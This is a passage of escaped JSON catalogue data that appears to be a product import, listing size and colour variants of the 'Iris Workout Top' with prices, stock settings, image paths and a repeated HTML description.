has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Red\"},\"1372\":{\"sku\":\"WS03-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Iris Workout Top-M-Blue\",\"description\":\"<p>The Iris Workout Top is sleeveless, body fitting and moisture wicking for a fashionable, functional garment. Rouched textures add style.<\\/p>\\n<p>&bull; Pink heather rouched v-neck.<br \\/>&bull; Scoop neckline.<br \\/>&bull; Angled flat seams.<br \\/>&bull; Moisture wicking.<br \\/>&bull; Body skimming.<br \\/>&bull; 83% Polyester \\/ 11% TENCEL&reg; Lyocell \\/ 6% Lycra&reg; Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"iris-workout-top-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"1373\":{\"sku\":\"WS03-M-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Iris Workout Top-M-Green\",\"description\":\"<p>The Iris Workout Top is sleeveless, body fitting and moisture wicking for a fashionable, functional garment. Rouched textures add style.<\\/p>\\n<p>&bull; Pink heather rouched v-neck.<br \\/>&bull; Scoop neckline.<br \\/>&bull; Angled flat seams.<br \\/>&bull; Moisture wicking.<br \\/>&bull; Body skimming.<br \\/>&bull; 83% Polyester \\/ 11% TENCEL&reg; Lyocell \\/ 6% Lycra&reg; Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"iris-workout-top-m-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Green\"},\"1374\":{\"sku\":\"WS03-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Iris Workout Top-M-Red\",\"description\":\"<p>The Iris Workout Top is sleeveless, body fitting and moisture wicking for a fashionable, functional garment. Rouched textures add style.<\\/p>\\n<p>&bull; Pink heather rouched v-neck.<br \\/>&bull; Scoop neckline.<br \\/>&bull; Angled flat seams.<br \\/>&bull; Moisture wicking.<br \\/>&bull; Body skimming.<br \\/>&bull; 83% Polyester \\/ 11% TENCEL&reg; Lyocell \\/ 6% Lycra&reg; Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"iris-workout-top-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws03-red_alt1.jpg,\\/w\\/s\\/ws03-red_back.jpg\",\"image\":\"\\/w\\/s\\/ws03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws03-red_alt1.jpg,\\/w\\/s\\/ws03-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},\"1375\":{\"sku\":\"WS03-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Iris Workout Top-L-Blue\",\"description\":\"<p>The Iris Workout Top is sleeveless, body fitting and moisture wicking for a fashionable, functional garment. Rouched textures add style.<\\/p>\\n<p>&bull; Pink heather rouched v-neck.<br \\/>&bull; Scoop neckline.<br \\/>&bull; Angled flat seams.<br \\/>&bull; Moisture wicking.<br \\/>&bull; Body skimming.<br \\/>&bull; 83% Polyester \\/ 11% TENCEL&reg; Lyocell \\/ 6% Lycra&reg; Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"iris-workout-top-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"1376\":{\"sku\":\"WS03-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Iris Workout Top-L-Green\",\"description\":\"<p>The Iris Workout Top is sleeveless, body fitting and moisture wicking for a fashionable, functional garment. Rouched textures add style.<\\/p>\\n<p>&bull; Pink heather rouched v-neck.<br \\/>&bull; Scoop neckline.<br \\/>&bull; Angled flat seams.<br \\/>&bull; Moisture wicking.<br \\/>&bull; Body skimming.<br \\/>&bull; 83% Polyester \\/ 11% TENCEL&reg; Lyocell \\/ 6% Lycra&reg; Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"iris-workout-top-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},\"1377\":{\"sku\":\"WS03-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Iris Workout Top-L-Red\",\"description\":\"<p>The Iris Workout Top is sleeveless, body fitting and moisture wicking for a fashionable, functional garment. Rouched textures add style.<\\/p>\\n<p>&bull; Pink heather rouched v-neck.<br \\/>&bull; Scoop neckline.<br \\/>&bull; Angled flat seams.<br \\/>&bull; Moisture wicking.<br \\/>&bull; Body skimming.<br \\/>&bull; 83% Polyester \\/ 11% TENCEL&reg; Lyocell \\/ 6% Lycra&reg; Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"iris-workout-top-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws03-red_alt1.jpg,\\/w\\/s\\/ws03-red_back.jpg\",\"image\":\"\\/w\\/s\\/ws03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws03-red_alt1.jpg,\\/w\\/s\\/ws03-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"1378\":{\"sku\":\"WS03-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Iris Workout Top-XL-Blue\",\"description\":\"<p>The Iris Workout Top is sleeveless, body fitting and moisture wicking for a fashionable, functional garment. Rouched textures add style.<\\/p>\\n<p>&bull; Pink heather rouched v-neck.<br \\/>&bull; Scoop neckline.<br \\/>&bull; Angled flat seams.<br \\/>&bull; Moisture wicking.<br \\/>&bull; Body skimming.<br \\/>&bull; 83% Polyester \\/ 11% TENCEL&reg; Lyocell \\/ 6% Lycra&reg; Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"iris-workout-top-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"1379\":{\"sku\":\"WS03-XL-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Iris Workout Top-XL-Green\",\"description\":\"<p>The Iris Workout Top is sleeveless, body fitting and moisture wicking for a fashionable, functional garment. Rouched textures add style.<\\/p>\\n<p>&bull; Pink heather rouched v-neck.<br \\/>&bull; Scoop neckline.<br \\/>&bull; Angled flat seams.<br \\/>&bull; Moisture wicking.<br \\/>&bull; Body skimming.<br \\/>&bull; 83% Polyester \\/ 11% TENCEL&reg; Lyocell \\/ 6% Lycra&reg; Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"iris-workout-top-xl-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Green\"},\"1380\":{\"sku\":\"WS03-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Iris Workout Top-XL-Red\",\"description\":\"<p>The Iris Workout Top is sleeveless, body fitting and moisture wicking for a fashionable, functional garment. Rouched textures add style.<\\/p>\\n<p>&bull; Pink heather rouched v-neck.<br \\/>&bull; Scoop neckline.<br \\/>&bull; Angled flat seams.<br \\/>&bull; Moisture wicking.<br \\/>&bull; Body skimming.<br \\/>&bull; 83% Polyester \\/ 11% TENCEL&reg; Lyocell \\/ 6% Lycra&reg; Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"iris-workout-top-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_